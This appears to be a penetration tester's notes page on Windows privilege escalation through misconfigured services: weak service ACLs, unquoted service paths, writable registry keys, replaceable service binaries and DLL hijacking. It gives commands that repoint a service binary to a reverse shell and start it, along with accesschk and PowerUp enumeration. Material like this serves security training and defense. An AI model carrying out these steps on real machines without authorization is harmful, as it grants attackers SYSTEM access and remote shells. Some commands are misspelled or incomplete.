Edit

Service Exploits

If a service runs with a SYSTEM Privs and are misconfigured, exploiting them may lead to command execution with SYSTEM privilege as well.

Service Commands

# Query the configuration of a service
sc.exe qc <name>

# Query the current status of a service
sc.exe query <name>

# Modify a configuration option of a service
sc.exe config <name> <option>= <value>

# Start/Stop a service
net start/stop <name>

Service Misconfigurations

Insecure Service Permissions

Each service has an ACL which defined certain service-specific permission

# Innocuous Service Permission
SERVICE_QUERY_CONFIG
SERVICE_QUERY_STATUS

# Usefull Service Permission to check weather service is starable or stopable by the user
SERVICE_STOP
SERVICE_START

# Dangerous Service
SERVICE_CHANGE_CONFIG
SERVICE_ALL_ACCESS

  • If user has permission to change service configuration with SYSTEM priv, the change the executable path with our own

  • We need to have permission to start/stop the service, to be able to escalate prvileges Check ACLs for a service

.\accesschk.exe /accepteula -uwcqv <user> <service>

  • Change binary path of a service

sc.exe config <service> binpath= "\"C:\reverse_shell.exe\""

# start service to start the reverse shell
net start <service>

  • Using powershell to enumerate the pathnames

Get-WmiObject -Class win32_service | select-object pathname

  • PowerUp can be used to query services whose binpath can be mofified by the current user:

Get-ModifiableServiceFile -Verbose

  • PowerUp can be used to query services whose configuration can be changed by the current user:

Get-ModifiableService -Verbose

Unquoted Service Path

# runs someProgram.exe
"C:\Program Files\Some Dir\SomeProgram.exe"

C:\Program Files\Some Dir\SomeProgram.exe
# Should run Program first with two argument Files\Some and Dir\Someprogram.exe
# windows resolve this ambiguity by checking each possibiltity in turn.
# Execution order:
# 1. "C:\Program"
# 2. "C:\Program Files\Some"
# 3. "C:\Program Files\Some Dir\SomeProgram.exe"

  • This can be exploited to check which directory can we access and put our reverse shell there with write access.

  • To check write access for each of these directories

.\acchesschk -quvdw "C:\"
.\acchesschk -quvdw "C:\Program Files\"
.
.
.

  • After writeable path is found. Copy the reverse shell.

# "C:\Program Files\Some"
net start

  • We get a reverse shell

  • PowerUp script can be used to search for unquoted service paths:

Get-ServiceUnquoted -Verbose

Weak Registry Permission

  • Stores data for each service

  • Registries have ACL

  • ACLs can be misconfigured

  • may be possible to service config via registry.

# Verify Writable registry keys:
Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | select-object -Property *

# Verify writibility via accesschk
.\accesshk -quv
# Query the registry key
reg query <registry>

# Overwrite the exectable
reg add <registry> /v <variable> /t <data_type> /d <data> /f

# restart the service
net start regsvc

Insecure Service Executable

If the original executable is modifiable by our user.

# Overwrite the service executable with our reverse shell.
net start <service>

DLL Hijacking

  • A DLL is missing from the system.

  • Our user has write permission on the directory where the DDL is looked for by the system.

  • DDL is executed with the same privilege as the process that imports the DLL

# Test which service we can stop and start
# copy over to our system
# Use procmon64 to analyze missing DLL
# Check if that path is writable or not
# Place reverse shell there
net start <service>

Last updated